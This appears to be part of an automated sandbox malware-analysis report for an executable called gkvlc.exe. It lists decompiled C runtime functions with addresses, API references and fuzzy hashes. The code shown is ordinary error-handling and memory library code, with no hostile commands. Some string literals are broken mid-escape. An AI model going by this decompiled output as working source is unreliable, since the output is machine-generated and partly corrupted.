                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 4031098158-0
                                                                                            • Opcode ID: 9c1baffb0642e6a3acc297bdf10e03d64b24b36c452280aee7a2d7e9e4b6e69a
                                                                                            • Instruction ID: d3cef6395c2b6daee70f576ebcacb463adf45bbb343f735f36a926b35af45b1f
                                                                                            • Opcode Fuzzy Hash: 9c1baffb0642e6a3acc297bdf10e03d64b24b36c452280aee7a2d7e9e4b6e69a
                                                                                            • Instruction Fuzzy Hash: F5D19E71D002589FCB15CFA8C9809EDBBB5FF49314F28416AE855BB382D7349E46CB98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004023C1 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 82%
                                                                                            			E004023C1(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x4170a0 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E00402694(_t13,  *0x4170a0);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E004026CF(_t14,  *0x4170a0, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E00404DFA();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E004026CF(_t18,  *0x4170a0, 0);
								} else {
									_t8 = E004026CF(_t18,  *0x4170a0, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E00404D41(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}











                                                                                            0x004023c1
                                                                                            0x004023c8
                                                                                            0x004023db
                                                                                            0x004023e2
                                                                                            0x004023e4
                                                                                            0x004023e8
                                                                                            0x00402401
                                                                                            0x00402401
                                                                                            0x004023ea
                                                                                            0x004023ec
                                                                                            0x004023ff
                                                                                            0x00402406
                                                                                            0x0040240f
                                                                                            0x00402412
                                                                                            0x00402415
                                                                                            0x00402429
                                                                                            0x00402429
                                                                                            0x00402432
                                                                                            0x00402417
                                                                                            0x0040241e
                                                                                            0x00402424
                                                                                            0x00402427
                                                                                            0x0040243b
                                                                                            0x0040243d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402427
                                                                                            0x00402440
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004023ff
                                                                                            0x004023ec
                                                                                            0x00402448
                                                                                            0x00402452
                                                                                            0x004023ca
                                                                                            0x004023cc
                                                                                            0x004023cc

                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,004023B8,004021EF,004019D2), ref: 004023CF
                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004023DD
                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004023F6
                                                                                            • SetLastError.KERNEL32(00000000,004023B8,004021EF,004019D2), ref: 00402448
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                            • String ID:
                                                                                            • API String ID: 3852720340-0
                                                                                            • Opcode ID: a9e2bd897894fe444ef7f509ab6237882b039f84660cbe8babb87493e4817e26
                                                                                            • Instruction ID: 34e63ccc163da715a0174f3e0f753abc8fd8917535243c38918a51588d4845d7
                                                                                            • Opcode Fuzzy Hash: a9e2bd897894fe444ef7f509ab6237882b039f84660cbe8babb87493e4817e26
                                                                                            • Instruction Fuzzy Hash: 5301243210D3155EE62427B57D8D6A72A95EB45378B30823FF514602F1FFFA0C42915C
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040366B Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 179COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 61%
                                                                                            			E0040366B(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _t72;
				signed int _t73;
				signed int _t74;
				intOrPtr* _t77;
				void* _t81;
				signed int _t83;
				intOrPtr _t86;
				void* _t87;
				void* _t88;
				signed char _t95;
				signed char _t98;
				signed char _t104;
				intOrPtr _t105;
				intOrPtr _t107;
				intOrPtr _t108;
				signed int _t109;
				intOrPtr _t111;
				signed int _t115;
				char _t116;
				intOrPtr _t117;
				intOrPtr _t123;
				intOrPtr _t124;
				signed int _t130;
				signed int _t131;
				intOrPtr _t137;

				_t72 = E00405DBA(_a4);
				_t135 = _t72;
				_t73 = _t72 >> 6;
				_v36 = _t73;
				_t115 = (_t72 & 0x0000003f) * 0x38;
				_v8 = 0;
				_t74 =  *((intOrPtr*)(0x417ed8 + _t73 * 4));
				_v32 = _t74;
				_v28 = _t115;
				_t116 =  *((intOrPtr*)(_t74 + _t115 + 0x29));
				_v24 = _t116;
				if(_t116 != 1) {
					_v16 = 1;
				} else {
					_t111 = 2;
					_v16 = _t111;
				}
				_t77 = _a4;
				_t117 =  *((intOrPtr*)(_t77 + 8));
				_v20 = _t117;
				if(_t117 != 0) {
					_t19 =  &_v28; // 0x403640
					_t107 =  *_t19;
					asm("cdq");
					_v12 = _t130;
					asm("cdq");
					_t121 =  *_t77 -  *((intOrPtr*)(_t77 + 4)) + _v20;
					_t80 = _v12;
					_v20 =  *_t77 -  *((intOrPtr*)(_t77 + 4)) + _v20;
					asm("adc eax, edx");
					_t131 = _v32;
					__eflags =  *((char*)(_t131 + _t107 + 0x28));
					_t108 = _v16;
					if( *((char*)(_t131 + _t107 + 0x28)) < 0) {
						_t81 = E00406AC6(_t135, 0, 0, 2);
						__eflags = _t81 - _a8;
						if(_t81 != _a8) {
							L14:
							_t83 = E00406AC6(_t135, _a8, _a12, 0) & _t131;
							_t131 = _t131 | 0xffffffff;
							__eflags = _t83 - _t131;
							if(_t83 != _t131) {
								__eflags = _v12;
								if(__eflags > 0) {
									L22:
									asm("cdq");
									_t109 =  *(_a4 + 0x18);
									L23:
									_t57 =  &_v28; // 0x403640
									_t86 =  *_t57;
									_t123 =  *((intOrPtr*)(0x417ed8 + _v36 * 4));
									__eflags =  *(_t123 + _t86 + 0x28) & 0x00000004;
									if(( *(_t123 + _t86 + 0x28) & 0x00000004) == 0) {
										L29:
										_t87 = E0040EDE0(_t109, _t131, _v16, _v8);
										_push(_v8);
										_push(_v16);
										L30:
										_t69 =  &_a20; // 0x403640
										_push( *_t69);
										_push(_a16);
										_t88 = E0040EDE0();
										asm("sbb edx, edi");
										asm("adc edx, [ebp+0x10]");
										return _t88 - _t87 + _a8;
									}
									_t124 = _v24;
									__eflags = _t124 - 1;
									if(_t124 == 1) {
										L26:
										_push(2);
										_pop(1);
										L27:
										__eflags = _t109;
										L28:
										asm("adc edx, edi");
										goto L29;
									}
									__eflags = _t124 - 2;
									if(_t124 != 2) {
										goto L27;
									}
									goto L26;
								}
								_t109 = 0x200;
								if(__eflags < 0) {
									L19:
									_t95 =  *(_a4 + 0xc) >> 6;
									__eflags = 1 & _t95;
									if((1 & _t95) == 0) {
										goto L22;
									}
									_t98 =  *(_a4 + 0xc) >> 8;
									__eflags = 1 & _t98;
									if((1 & _t98) != 0) {
										goto L22;
									}
									_t131 = 0;
									goto L23;
								}
								__eflags = _v20 - 0x200;
								if(_v20 > 0x200) {
									goto L22;
								}
								goto L19;
							}
							return _t131;
						}
						__eflags = _t131 - _a12;
						if(_t131 != _a12) {
							goto L14;
						}
						_t137 = _a4;
						_t109 = E004039C3( *((intOrPtr*)(_t137 + 4)), _v20 +  *((intOrPtr*)(_t137 + 4)), _v24) + _v20;
						asm("adc edx, [ebp-0x8]");
						_t104 =  *(_t137 + 0xc) >> 5;
						__eflags = 1 & _t104;
						if((1 & _t104) == 0) {
							goto L29;
						}
						_t105 = _v24;
						__eflags = _t105 - 1;
						if(_t105 == 1) {
							L12:
							_push(2);
							_pop(1);
							L13:
							_t109 = _t109 + 1;
							goto L28;
						}
						__eflags = _t105 - 2;
						if(_t105 != 2) {
							goto L13;
						}
						goto L12;
					}
					_t87 = E0040EDE0(_t121, _t80, _t108, _v8);
					_push(_v8);
					_push(_t108);
					goto L30;
				} else {
					return _a8;
				}
			}




































                                                                                            0x00403679
                                                                                            0x0040367e
                                                                                            0x00403683
                                                                                            0x0040368b
                                                                                            0x0040368e
                                                                                            0x00403691
                                                                                            0x00403694
                                                                                            0x0040369b
                                                                                            0x0040369e
                                                                                            0x004036a1
                                                                                            0x004036a8
                                                                                            0x004036ad
                                                                                            0x004036b7
                                                                                            0x004036af
                                                                                            0x004036b1
                                                                                            0x004036b2
                                                                                            0x004036b2
                                                                                            0x004036ba
                                                                                            0x004036bd
                                                                                            0x004036c0
                                                                                            0x004036c5
                                                                                            0x004036d7
                                                                                            0x004036d7
                                                                                            0x004036dc
                                                                                            0x004036df
                                                                                            0x004036e5
                                                                                            0x004036e6
                                                                                            0x004036e8
                                                                                            0x004036eb
                                                                                            0x004036ee
                                                                                            0x004036f0
                                                                                            0x004036f6
                                                                                            0x004036fb
                                                                                            0x004036fe
                                                                                            0x00403719
                                                                                            0x00403721
                                                                                            0x00403724
                                                                                            0x00403772
                                                                                            0x0040377f
                                                                                            0x00403784
                                                                                            0x00403787
                                                                                            0x00403789
                                                                                            0x00403792
                                                                                            0x00403795
                                                                                            0x004037c6
                                                                                            0x004037cc
                                                                                            0x004037cd
                                                                                            0x004037cf
                                                                                            0x004037d2
                                                                                            0x004037d2
                                                                                            0x004037d5
                                                                                            0x004037dc
                                                                                            0x004037e1
                                                                                            0x004037f9
                                                                                            0x00403801
                                                                                            0x00403806
                                                                                            0x00403809
                                                                                            0x0040380c
                                                                                            0x0040380c
                                                                                            0x0040380c
                                                                                            0x00403813
                                                                                            0x00403816
                                                                                            0x0040381d
                                                                                            0x00403822
                                                                                            0x00000000
                                                                                            0x00403822
                                                                                            0x004037e3
                                                                                            0x004037e9
                                                                                            0x004037eb
                                                                                            0x004037f2
                                                                                            0x004037f2
                                                                                            0x004037f4
                                                                                            0x004037f5
                                                                                            0x004037f5
                                                                                            0x004037f7
                                                                                            0x004037f7
                                                                                            0x00000000
                                                                                            0x004037f7
                                                                                            0x004037ed
                                                                                            0x004037f0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004037f0
                                                                                            0x00403797
                                                                                            0x0040379c
                                                                                            0x004037a3
                                                                                            0x004037ac
                                                                                            0x004037b0
                                                                                            0x004037b2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004037bb
                                                                                            0x004037be
                                                                                            0x004037c0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004037c2
                                                                                            0x00000000
                                                                                            0x004037c2
                                                                                            0x0040379e
                                                                                            0x004037a1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004037a1
                                                                                            0x00000000
                                                                                            0x0040378b
                                                                                            0x00403726
                                                                                            0x00403729
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040372b
                                                                                            0x00403745
                                                                                            0x0040374b
                                                                                            0x00403751
                                                                                            0x00403755
                                                                                            0x00403757
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040375d
                                                                                            0x00403760
                                                                                            0x00403762
                                                                                            0x00403768
                                                                                            0x00403768
                                                                                            0x0040376a
                                                                                            0x0040376b
                                                                                            0x0040376b
                                                                                            0x00000000
                                                                                            0x0040376b
                                                                                            0x00403764
                                                                                            0x00403766
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403766
                                                                                            0x00403706
                                                                                            0x0040370b
                                                                                            0x0040370e
                                                                                            0x00000000
                                                                                            0x004036c7
                                                                                            0x00000000
                                                                                            0x004036ca

                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00403706
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00403801
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00403816
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID: @6@$@6@
                                                                                            • API String ID: 885266447-4089279410
                                                                                            • Opcode ID: 20b13714b5c29a8fd5677eebefbd846026af95720616d89a2682231c662c227e
                                                                                            • Instruction ID: 58b92fa06d2c45fd7b3220b6394935a26c1c544e43db34173973f542a3cf171c
                                                                                            • Opcode Fuzzy Hash: 20b13714b5c29a8fd5677eebefbd846026af95720616d89a2682231c662c227e
                                                                                            • Instruction Fuzzy Hash: 7A51C1B5A00209AFCF14DF58C891AAE7FB6EF49311F14C46AF855BB391D2389E41CB54
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040784E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E0040784E(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E00408248(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E00408248(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E00405119(GetLastError());
									_t17 =  *((intOrPtr*)(E0040514F(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E00407915(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E00405119(GetLastError());
						_t17 =  *((intOrPtr*)(E0040514F(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E00407915(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E0040793C(_a8);
				return 0;
			}









                                                                                            0x00407854
                                                                                            0x00407859
                                                                                            0x0040786d
                                                                                            0x00407870
                                                                                            0x004078a2
                                                                                            0x004078aa
                                                                                            0x004078ac
                                                                                            0x004078c5
                                                                                            0x004078c8
                                                                                            0x004078cb
                                                                                            0x004078d9
                                                                                            0x004078e8
                                                                                            0x004078f0
                                                                                            0x004078f2
                                                                                            0x0040790b
                                                                                            0x0040790e
                                                                                            0x0040790e
                                                                                            0x004078f4
                                                                                            0x004078fb
                                                                                            0x00407906
                                                                                            0x00407906
                                                                                            0x00407910
                                                                                            0x00407911
                                                                                            0x00000000
                                                                                            0x00407911
                                                                                            0x004078d0
                                                                                            0x004078d5
                                                                                            0x004078d7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004078d7
                                                                                            0x004078b5
                                                                                            0x004078c0
                                                                                            0x00000000
                                                                                            0x004078c0
                                                                                            0x00407872
                                                                                            0x00407875
                                                                                            0x00407878
                                                                                            0x0040788b
                                                                                            0x0040788e
                                                                                            0x00407890
                                                                                            0x00407892
                                                                                            0x00000000
                                                                                            0x00407892
                                                                                            0x0040787e
                                                                                            0x00407883
                                                                                            0x00407885
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407885
                                                                                            0x0040785e
                                                                                            0x00000000

                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\gkvlc.exe, xrefs: 00407853
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\gkvlc.exe
                                                                                            • API String ID: 0-3342847095
                                                                                            • Opcode ID: 08e519ae9fb9dd6253a703d045cb969c3829be448faf5f52687bed115ff3f46a
                                                                                            • Instruction ID: 840f885b5e6e5e4e80b82f378fafb304c1ba93cfe93c74958bf3ff19926d1f58
                                                                                            • Opcode Fuzzy Hash: 08e519ae9fb9dd6253a703d045cb969c3829be448faf5f52687bed115ff3f46a
                                                                                            • Instruction Fuzzy Hash: 8121D6B1A086057FEB106F658C80927775DEB403A8710893AF515B72D1D738FD50876A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004054A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 75%
                                                                                            			E004054A0(void* __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x4170d8; // 0xb
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E004096D6(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E00406F85(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E004096D6(__eflags,  *0x4170d8, _t51);
							if(__eflags != 0) {
								E004052CE(_t51, "\xef\xbf\								E00406FE2(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E004096D6(__eflags,  *0x4170d8, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E004096D6(0,  *0x4170d8, 0);
							_push(0);
							L9:
							E00406FE2();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E00409697(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x4170d8; // 0xb
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E00404DB6(_t39, _t43, _t49, _t60);
					asm("int3");
					_t5 =  *0x4170d8; // 0xb
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E004096D6(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E00406F85(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E004096D6(__eflags,  *0x4170d8, _t60);
								if(__eflags != 0) {
									E004052CE(_t60, "\xef\xbf\									E00406FE2(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E004096D6(__eflags,  *0x4170d8, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E004096D6(__eflags,  *0x4170d8, _t20);
								_push(_t60);
								L25:
								E00406FE2();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E00409697(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x4170d8; // 0xb
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E00404DB6(_t39, _t43, _t49, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x4170d8; // 0xb
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E004096D6(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E00406F85(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E004096D6(__eflags,  *0x4170d8, _t54);
											if(__eflags != 0) {
												E004052CE(_t54, "\xef\xbf\												E00406FE2(0);
												goto L45;
											} else {
												_t40 = 0;
												E004096D6(__eflags,  *0x4170d8, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E004096D6(0,  *0x4170d8, 0);
											_push(0);
											L41:
											E00406FE2();
											goto L36;
										}
									}
								} else {
									_t54 = E00409697(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x4170d8; // 0xb
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}






















                                                                                            0x004054a0
                                                                                            0x004054a0
                                                                                            0x004054ab
                                                                                            0x004054ad
                                                                                            0x004054b2
                                                                                            0x004054b5
                                                                                            0x004054d3
                                                                                            0x004054d6
                                                                                            0x004054db
                                                                                            0x004054dd
                                                                                            0x00000000
                                                                                            0x004054df
                                                                                            0x004054eb
                                                                                            0x004054ee
                                                                                            0x004054ef
                                                                                            0x004054f1
                                                                                            0x00405516
                                                                                            0x00405518
                                                                                            0x00405531
                                                                                            0x00405538
                                                                                            0x0040553d
                                                                                            0x00000000
                                                                                            0x0040551a
                                                                                            0x0040551a
                                                                                            0x00405523
                                                                                            0x00405528
                                                                                            0x00000000
                                                                                            0x00405528
                                                                                            0x004054f3
                                                                                            0x004054f3
                                                                                            0x004054f3
                                                                                            0x004054fc
                                                                                            0x00405501
                                                                                            0x00405502
                                                                                            0x00405502
                                                                                            0x00405507
                                                                                            0x00000000
                                                                                            0x00405507
                                                                                            0x004054f1
                                                                                            0x004054b7
                                                                                            0x004054bd
                                                                                            0x004054c1
                                                                                            0x004054ce
                                                                                            0x00000000
                                                                                            0x004054c3
                                                                                            0x004054c6
                                                                                            0x00405540
                                                                                            0x00405540
                                                                                            0x004054c8
                                                                                            0x004054c8
                                                                                            0x004054c8
                                                                                            0x004054ca
                                                                                            0x004054ca
                                                                                            0x004054ca
                                                                                            0x004054c6
                                                                                            0x004054c1
                                                                                            0x00405543
                                                                                            0x0040554b
                                                                                            0x0040554d
                                                                                            0x0040554f
                                                                                            0x00405557
                                                                                            0x0040555c
                                                                                            0x0040555d
                                                                                            0x00405562
                                                                                            0x00405563
                                                                                            0x00405566
                                                                                            0x00405580
                                                                                            0x00405583
                                                                                            0x00405588
                                                                                            0x0040558a
                                                                                            0x00000000
                                                                                            0x0040558c
                                                                                            0x00405598
                                                                                            0x0040559b
                                                                                            0x0040559c
                                                                                            0x0040559e
                                                                                            0x004055c1
                                                                                            0x004055c3
                                                                                            0x004055da
                                                                                            0x004055e1
                                                                                            0x004055e6
                                                                                            0x00000000
                                                                                            0x004055c5
                                                                                            0x004055cc
                                                                                            0x004055d1
                                                                                            0x00000000
                                                                                            0x004055d1
                                                                                            0x004055a0
                                                                                            0x004055a7
                                                                                            0x004055ac
                                                                                            0x004055ad
                                                                                            0x004055ad
                                                                                            0x004055b2
                                                                                            0x00000000
                                                                                            0x004055b2
                                                                                            0x0040559e
                                                                                            0x00405568
                                                                                            0x0040556e
                                                                                            0x00405570
                                                                                            0x00405572
                                                                                            0x0040557b
                                                                                            0x00000000
                                                                                            0x00405574
                                                                                            0x00405574
                                                                                            0x00405577
                                                                                            0x004055f1
                                                                                            0x004055f1
                                                                                            0x004055f6
                                                                                            0x004055f9
                                                                                            0x004055fa
                                                                                            0x004055fb
                                                                                            0x00405602
                                                                                            0x00405604
                                                                                            0x00405609
                                                                                            0x0040560c
                                                                                            0x0040562a
                                                                                            0x0040562d
                                                                                            0x00405632
                                                                                            0x00405634
                                                                                            0x00000000
                                                                                            0x00405636
                                                                                            0x00405642
                                                                                            0x00405646
                                                                                            0x00405648
                                                                                            0x0040566d
                                                                                            0x0040566f
                                                                                            0x00405688
                                                                                            0x0040568f
                                                                                            0x00000000
                                                                                            0x00405671
                                                                                            0x00405671
                                                                                            0x0040567a
                                                                                            0x0040567f
                                                                                            0x00000000
                                                                                            0x0040567f
                                                                                            0x0040564a
                                                                                            0x0040564a
                                                                                            0x0040564a
                                                                                            0x00405653
                                                                                            0x00405658
                                                                                            0x00405659
                                                                                            0x00405659
                                                                                            0x00000000
                                                                                            0x0040565e
                                                                                            0x00405648
                                                                                            0x0040560e
                                                                                            0x00405614
                                                                                            0x00405616
                                                                                            0x00405618
                                                                                            0x00405625
                                                                                            0x00000000
                                                                                            0x0040561a
                                                                                            0x0040561a
                                                                                            0x0040561d
                                                                                            0x00405697
                                                                                            0x00405697
                                                                                            0x0040561f
                                                                                            0x0040561f
                                                                                            0x0040561f
                                                                                            0x0040561f
                                                                                            0x00405621
                                                                                            0x00405621
                                                                                            0x00405621
                                                                                            0x0040561d
                                                                                            0x00405618
                                                                                            0x0040569a
                                                                                            0x004056a2
                                                                                            0x004056a4
                                                                                            0x004056a4
                                                                                            0x004056ab
                                                                                            0x00405579
                                                                                            0x004055e9
                                                                                            0x004055e9
                                                                                            0x004055eb
                                                                                            0x00000000
                                                                                            0x004055ed
                                                                                            0x004055f0
                                                                                            0x004055f0
                                                                                            0x004055eb
                                                                                            0x00405577
                                                                                            0x00405572
                                                                                            0x00405551
                                                                                            0x00405556
                                                                                            0x00405556

                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(004033BF,004033BF,900C408B,0040B4CD,8304488B,004033BF,?,?,0040B98C,004033BF,00401056,004033BF,004033BF,00000010,00406D16,00000000), ref: 004054A5
                                                                                            • _free.LIBCMT ref: 00405502
                                                                                            • _free.LIBCMT ref: 00405538
                                                                                            • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,0040B98C,004033BF,00401056,004033BF,004033BF,00000010,00406D16,00000000,8304488B,00401056,00401056,?), ref: 00405543
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
